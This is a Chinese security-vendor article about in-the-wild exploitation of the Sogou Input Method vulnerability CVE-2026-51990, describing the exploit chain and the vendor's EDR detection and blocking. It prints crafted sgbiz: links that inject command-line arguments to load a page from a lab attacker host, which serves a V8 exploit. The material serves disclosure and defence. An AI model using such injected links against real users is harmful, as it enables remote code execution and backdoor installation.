网易首页 > 网易号 > 正文 申请入驻

搜狗输入法CVE-2026-51990在野利用:联软UniEDR检测有效、阻断到位

0
分享至



近日,联软安全运营团队监测到互联网披露了针对 Windows 版搜狗输入法远程代码执行漏洞(CVE-2026-51990)的在野攻击:攻击者仅需一条 sgbiz: 链接,即可将恶意网页送入无沙箱的内置 Chromium 并执行任意代码,该漏洞目前已被用于投放 GRAYRABBIT 后门。联软安全运营团队已第一时间完成漏洞复现与利用链验证,并同步实测了 UniEDR 的防护效果——内置专家规则(规则名称:通过搜狗输入法远程执行代码(CVE-2026-51990))可实时检出利用行为,开启实时拦截后可在恶意渲染进程启动阶段完成阻断,攻击在代码执行前即告失败。以下为检测阻断实测过程与完整漏洞分析。

一、联软 UniEDR 检测与阻断实测

联软安全运营团队已在实验环境中完整复现该漏洞的利用链,并以此验证 UniEDR 的防护效果。UniEDR 内置专家规则(规则名称:通过搜狗输入法远程执行代码(CVE-2026-51990),告警名称“通过搜狗输入法远程执行代码(CVE-2026-51990)”)可实时检出漏洞利用行为;开启实时拦截后,可在恶意渲染进程启动阶段直接阻断,使攻击链无法走完。

① 访问恶意链接:本地计算器被直接拉起,说明漏洞利用成功,任意代码已在本机执行。



② UniEDR 实时告警:规则 ID 200330 命中,风险等级为“高”,攻击链上的每一步进程创建均被完整记录。



③ 告警详情可完整还原攻击链:(点击sgbiz链接)msedge.exe → biz_helper.exe → SGMyInput.exe → SGWebRender.exe 的逐级创建关系清晰可见,并保留关键进程命令行,为溯源与处置提供直接证据。



④ 开启实时拦截后,SGWebRender.exe 在启动阶段即被终止,恶意页面始终停留在“正在加载”,页面代码无法执行,漏洞利用被彻底阻断。



实测表明,UniEDR 对搜狗输入法 CVE-2026-51990 的利用行为具备“检测—分析—阻断”的完整能力闭环:检测环节规则精准命中、告警及时;分析环节进程链与命令行可完整回溯;阻断环节在恶意渲染进程启动前完成拦截,攻击以失败告终。

下文将完整复现该漏洞的成因与利用链,以便说明 UniEDR 究竟检测到了什么、又阻断在何处。

二、漏洞背景

近日,联软安全运营团队发现针对 Windows 版搜狗输入法的野外攻击。攻击者(公开报告记为 UNC3569)以一条 sgbiz: 链接将受害者引导至皮肤商城的内置浏览器,再在其中触发 V8 n-day 漏洞并植入后门。目前该攻击已被 UNC3569 组织用于投放 GRAYRABBIT 后门

(文章来源:https://www.gendigital.com/blog/insights/research/one-click-backdoor-sogou)。

三、漏洞复现

CVE-2026-51990

搜狗输入法并非单一可执行文件,而是一组通过 Windows 自定义协议(如 sgbiz:)通信的组件集合。在注册表 HKEY_CLASSES_ROOT\sgbiz 下可以看到,搜狗输入法注册了以下程序来解析 sgbiz 协议:

C:\Program Files (x86)\SogouInput\Components\biz_center\1.0.0.3315\biz_helper.exe 去解析 sgbiz 协议。



因此,用户打开任何以 sgbiz: 开头的 URL,Windows 都会将其交给协议处理程序 biz_helper.exe。更重要的是,该协议允许调用方指定启动哪一个搜狗组件,并为其附带任意命令行参数。当 biz_helper.exe 收到携带 sg_process 命令的 sgbiz: URL 时,内容如下:

sgbiz:sg_process?module=sgmyinput.exe¶m=-page=skincenter -url=http://192.168.145.132/qq.html

它会从 URL 中提取以下五个参数:

module: 要启动的搜狗可执行文件的名称

param: 传递给该可执行文件的命令行参数

work_dir: 工作目录

start_mode: 启动进程的方式

start_show: 窗口显示状态

但 param 参数没有任何校验:从 URL 中取出后仅做一次 URL 解码,便被原封不动地作为命令行参数传递给 module 所指向的任意可执行文件。这意味着攻击者可以构造一条链接,任意启动搜狗的可执行文件并注入任意命令行参数——这也为第二个漏洞埋下了伏笔。

SGMyInput.exe:可加载任意 URL

SGMyInput.exe 是皮肤类界面,-page= 决定打开哪一模块 UI。其中 skincenter 页面是皮肤市场,它会创建一个 CEF(Chromium 嵌入式框架)Webview 来显示皮肤商店。Webview 就绪后,程序会检查命令行中是否带有 -url,若有则将指定 URL 交给下一步渲染。值得一提的是,搜狗输入法对传入的 URL 未做任何校验,任何 URL 都会被渲染。

攻击者可以构造如下链接,通过 SGMyInput.exe 初始化 skincenter 模块,指定的 URL 即会被渲染:

sgbiz:sg_process?module=sgmyinput.exe¶m=-page=skincenter -url=http://192.168.145.132/qq.html

Chromium V8 n-day

搜狗输入法的皮肤渲染进程为 SGWebRender.exe,它本身只是一个薄启动器,实际加载的 DLL 为 SGMiniBrowserHelperHost1.0.0.8.dll。



该 DLL 捆绑的 libcef.dll 版本为 CEF 80.1.16 / Chromium 80.0.3987.163,版本严重落后,存在大量 V8 n-day 漏洞。



研究发现,搜狗输入法直接禁用了 Chromium 沙箱,同时也关闭了同源策略。这意味着 SGWebRender.exe 渲染器一旦被攻破,原生 shellcode 便以当前用户权限直接执行,无需再做额外逃逸。

四、完整攻击链利用

攻击者可以构造如下恶意链接(需进行两次 URL 编码):

sgbiz:sg_process?module=sgmyinput.exe¶m=-page%3Dskincenter%20-url%3Dhttp%253a%252f%252f192.168.145.132%252fpoc1.html

当用户点击该链接后,Windows 识别到 sgbiz 协议,随即拉起 biz_helper.exe 进行解析。



biz_helper.exe 识别到 module 参数为 sgmyinput.exe,随即启动 sgmyinput.exe 初始化 skincenter 模块,并将 URL 传递至下一步渲染。



该网页包含触发 CVE-2021-38003(V8 漏洞)的 JavaScript 代码,一旦 SGWebRender.exe 渲染该页面,内嵌的 shellcode 便会随之执行。



五、漏洞影响范围



六、漏洞处置



七、修复建议

官方已发布修复版本,请及时升级。下载地址:

https://shurufa.sogou.com/windows

八、总结

Windows 版搜狗输入法(16.3.0.3498 之前)存在自定义协议缺陷(CVE-2026-51990):攻击者仅需一条 sgbiz: 链接,即可将恶意网页送入无沙箱的内置 Chromium 80 并执行任意代码,进而植入后门。本次实测证明,联软 UniEDR 已具备对该漏洞利用的完整防护能力——专家规则 200330 可实时检出,开启实时拦截后可在恶意渲染进程启动阶段阻断利用。建议用户尽快将搜狗输入法升级至 16.3.0.3498 或更高版本。

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
川普不用再有心结,哈马斯代言人获诺贝尔和平奖

川普不用再有心结,哈马斯代言人获诺贝尔和平奖

移光幻影
2026-10-09 23:40:52
野心彻底暴露!刘强东在中东大量买地,根本不是只做跨境电商

野心彻底暴露!刘强东在中东大量买地,根本不是只做跨境电商

阅微札记
2026-10-09 09:59:08
杭州降39%、广州降32%、上海降31%!不是房子卖光, 而是房东不卖了

杭州降39%、广州降32%、上海降31%!不是房子卖光, 而是房东不卖了

兴趣知识
2026-10-09 01:02:33
2027款Model Y正式上市,23万起售,优缺点一次性说透

2027款Model Y正式上市,23万起售,优缺点一次性说透

三农老历
2026-10-09 11:12:55
开局6轮不胜!富勒姆排名英超垫底 前皇马主帅面临下课

开局6轮不胜!富勒姆排名英超垫底 前皇马主帅面临下课

球事百科吖
2026-10-11 03:38:27
泰国真的不能再去了?无数游客亲身经历,坦言当地早已不复当年

泰国真的不能再去了?无数游客亲身经历,坦言当地早已不复当年

网络易不易
2026-09-30 06:10:17
史无前例!乌方公开证实:白俄罗斯特种部队已正式加入乌克兰军队

史无前例!乌方公开证实:白俄罗斯特种部队已正式加入乌克兰军队

史智文道
2026-10-06 22:01:47
双曼卫冕,马琳脸色铁青:王曼昱重摔那一下,比孙颖莎还让人揪心

双曼卫冕,马琳脸色铁青:王曼昱重摔那一下,比孙颖莎还让人揪心

冷桂零落
2026-10-11 03:22:07
WSBK葡萄牙站:德比斯17名发车第6完赛,正式无缘年度总冠军

WSBK葡萄牙站:德比斯17名发车第6完赛,正式无缘年度总冠军

全景体育V
2026-10-10 21:38:57
外媒评中国九大导演,陈凯歌落榜,张艺谋未进前五,冠军实至名归

外媒评中国九大导演,陈凯歌落榜,张艺谋未进前五,冠军实至名归

观察者海风
2026-10-08 19:43:37
最后时刻遭绝杀成都蓉城再失冠军点,主教练阿洛伊西:责任由我来担

最后时刻遭绝杀成都蓉城再失冠军点,主教练阿洛伊西:责任由我来担

封面新闻
2026-10-11 00:09:05
宅基地权属彻底敲定!就算老宅垮塌、房顶全塌,大伙犯不上瞎扯皮

宅基地权属彻底敲定!就算老宅垮塌、房顶全塌,大伙犯不上瞎扯皮

三农雷哥
2026-09-20 19:44:43
王皓被辱骂后续:3人被行政拘留,身份曝光,原来都是同一类人

王皓被辱骂后续:3人被行政拘留,身份曝光,原来都是同一类人

阿废冷眼观察所
2026-10-11 04:00:22
跳海救人的黄峰,履新省纪委

跳海救人的黄峰,履新省纪委

大风新闻
2026-10-10 09:12:08
住客称“凌晨睡梦中被老鼠咬伤”,涉事酒店:情况属实,酒店已做全面消杀,旁边是小吃街,老鼠可能是从其他地方跑来的

住客称“凌晨睡梦中被老鼠咬伤”,涉事酒店:情况属实,酒店已做全面消杀,旁边是小吃街,老鼠可能是从其他地方跑来的

南方都市报
2026-10-10 09:49:41
炸裂!女领导被爆婚内出轨9人,聊天记录露骨,女方撩拨攻势猛烈

炸裂!女领导被爆婚内出轨9人,聊天记录露骨,女方撩拨攻势猛烈

随笔写人间
2026-10-09 20:30:36
葡萄牙足协公布对C罗处罚结果

葡萄牙足协公布对C罗处罚结果

第一财经资讯
2026-10-10 21:54:44
某些无良媒体,你丫还有点良知和节操吗?

某些无良媒体,你丫还有点良知和节操吗?

涛哥锐评
2026-10-06 20:56:04
曝光后,上海这些"男神房""女神房"纷纷被下架

曝光后,上海这些"男神房""女神房"纷纷被下架

看看新闻Knews
2026-10-09 23:05:11
日本右翼向AI大模型“投毒”篡改历史,外交部回应

日本右翼向AI大模型“投毒”篡改历史,外交部回应

澎湃新闻
2026-10-09 16:48:46
2026-10-11 05:16:49
联软科技
联软科技
构建可控的互联世界!
230文章数 1关注度
往期回顾 全部

科技要闻

上世纪成熟的踏板,为何今天还会断裂?

头条要闻

港媒:梅艳芳骨灰被盗三个月无线索 歌迷会公开求助

头条要闻

港媒:梅艳芳骨灰被盗三个月无线索 歌迷会公开求助

体育要闻

十年回首:湖人三榜眼的夏天,与NBA无关

娱乐要闻

宋佳一串三大满贯 争议随之而来

财经要闻

双汇因抗生素超标共被罚1.29亿元

汽车要闻

千匹马力+三把锁/顶配能浮水 银河战舰700限时焕新价16.98万起

态度原创

本地
亲子
艺术
公开课
军事航空

本地新闻

踏访沙县第一村,寻国民小吃本源

亲子要闻

演员张歆艺自曝国庆带娃旅行后,儿子晚上11点不睡觉,被拉起来写作业后才入睡

艺术要闻

黄沙万里不见泪|仇英《明妃出塞图》:昭君从来不是悲情美人

公开课

李玫瑾:为什么性格比能力更重要?

军事要闻

美乌将举行新一轮会谈

无障碍浏览 进入关怀版